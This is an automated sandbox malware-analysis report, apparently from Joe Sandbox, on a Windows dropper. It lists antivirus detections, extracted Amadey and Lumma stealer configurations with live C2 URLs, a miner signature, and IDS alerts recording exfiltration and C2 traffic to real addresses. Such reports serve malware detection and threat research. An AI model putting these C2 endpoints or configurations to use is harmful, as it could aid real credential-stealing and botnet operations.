                            Source: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exeAvira: detection malicious, Label: HEUR/AGEN.1306956
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exeAvira: detection malicious, Label: HEUR/AGEN.1304644
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: HEUR/AGEN.1306956
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeAvira: detection malicious, Label: HEUR/AGEN.1304644
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Found malware configuration
                            Source: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                            Source: cad620f7d1.exe.6976.36.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://drive-connect.cyou/api", "Build Version": "FATE99--test"}
                            Multi AV Scanner detection for domain / URL
                            Source: pool.hashvault.proVirustotal: Detection: 6%Perma Link
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeReversingLabs: Detection: 63%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeReversingLabs: Detection: 54%
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exeReversingLabs: Detection: 63%
                            Source: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exeReversingLabs: Detection: 54%
                            Source: C:\Users\user\AppData\Local\Temp\1015831001\f5e7dd5dbb.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                            Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 66%
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 66%
                            Multi AV Scanner detection for submitted file
                            Source: file.exeVirustotal: Detection: 55%Perma Link
                            Source: file.exeReversingLabs: Detection: 47%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: file.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00416B7E CryptUnprotectData,36_2_00416B7E
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D313F0 CoResumeClassObjects,CryptContextAddRef,GetLastError,36_2_00D313F0

                            Bitcoin Miner

                            barindex
                            Yara detected Xmrig cryptocurrency miner
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000017.00000003.3848997557.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5676, type: MEMORYSTR
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49776 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49854 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49859 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49866 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49878 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49895 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49907 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49920 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49939 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49957 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:50155 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:50168 version: TLS 1.2
                            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdbSHA256}Lq source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdb source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00947978 FindFirstFileW,FindFirstFileW,free,27_2_00947978
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,27_2_0094881C
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extracted

                            Software Vulnerabilities

                            barindex
                            Suspicious execution chain found
                            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]36_2_0040A960
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]36_2_00426170
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then push eax36_2_0040C36E
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h36_2_0043DBD0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov edx, ecx36_2_00409CC0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh36_2_0043DCF0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [edx], bl36_2_0040CE55
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]36_2_0042C6D7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [esi], al36_2_0042C6D7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]36_2_0042C6D7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]36_2_0042C6D7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [eax], dx36_2_00417E82
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh36_2_0043E690
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]36_2_0042BFD3
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]36_2_0042BFDA
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]36_2_0042A060
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]36_2_00425F7D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov edx, ecx36_2_0041D074
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov edx, ecx36_2_0041D087
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [esi], cl36_2_0042D085
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [esi], cl36_2_0042D085
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]36_2_0041597D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]36_2_00416E97
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov edi, eax36_2_00416E97
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov ebx, eax36_2_00405910
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov ebp, eax36_2_00405910
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h36_2_00425920
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [eax], cx36_2_004286F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]36_2_00417190
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov ecx, eax36_2_00422270
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h36_2_0040C274
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov eax, dword ptr [00444284h]36_2_00425230
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]36_2_0043CAC0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]36_2_004292D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov edx, ebx36_2_004292D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]36_2_0042AAD0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [eax], cl36_2_00415ADC
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx ebx, bx36_2_0042536C
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]36_2_00402B70
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [ecx], dx36_2_00427307
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]36_2_00436B20
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]36_2_0043CBD6
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]36_2_00407470
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]36_2_00407470
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then jmp eax36_2_0042B475
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h36_2_00419C10
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]36_2_0043CCE0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov byte ptr [ebx], al36_2_0042B4BB
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]36_2_0043CD60
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx ebx, byte ptr [edx]36_2_004345F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]36_2_00427653
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]36_2_0043CE00
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h36_2_0042A630
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]36_2_004296D8
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]36_2_00415EE0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [eax], cx36_2_00421EE0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp al, 2Eh36_2_004266E7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [eax], cx36_2_004286F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]36_2_00416E97
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov edi, eax36_2_00416E97
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h36_2_0041CEA5
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then add ebx, 03h36_2_00428F5D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]36_2_00425F7D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h36_2_00414F08
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov ecx, edx36_2_00414F08
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [eax], cx36_2_00420717
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then mov word ptr [ecx], dx36_2_00420717
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h36_2_0043DFB0

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49782 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49794 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49825 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49846 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49877 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49908 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49927 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.4:61616 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49953 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49955 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49961 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49987 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49977 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49989 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49996 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49998 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49993 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49993 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49993
                            Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49993 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50018 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49993
                            Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49993 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50028 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50039 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50049 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50053 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50058 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50065 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50077
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50094 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50104 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50100 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50112 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50117 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50124
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50130 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:50136 -> 104.21.50.161:443
